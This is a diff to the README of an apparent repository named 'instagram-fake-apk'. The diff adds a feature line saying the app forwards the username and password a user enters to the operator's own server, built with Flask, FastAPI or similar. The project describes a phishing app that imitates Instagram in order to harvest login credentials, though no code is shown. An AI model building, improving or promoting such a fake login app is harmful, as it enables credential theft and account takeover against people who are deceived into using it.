alasgarovs/instagram-fake-apk/README.md

 ## Features

 - Allows users to enter their username and password.
+- Send credentials to your own server (flask, fastapi or which you want) which you create as if you want.
-- Validates the input and displays an error message if either the username or password is empty.
+- Validates the input and displays an error message and etc.

 ## Installation and Usage